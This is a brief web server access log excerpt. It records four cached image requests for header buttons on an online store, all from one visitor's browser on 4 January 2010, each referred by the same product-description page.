121.169.189.169 - - [04/Jan/2010:01:32:45 -0500] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):68974_________________________" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
121.169.189.169 - - [04/Jan/2010:01:32:45 -0500] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):68974_________________________" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
121.169.189.169 - - [04/Jan/2010:01:32:45 -0500] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):68974_________________________" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
121.169.189.169 - - [04/Jan/2010:01:32:45 -0500] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):68974_________________________" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
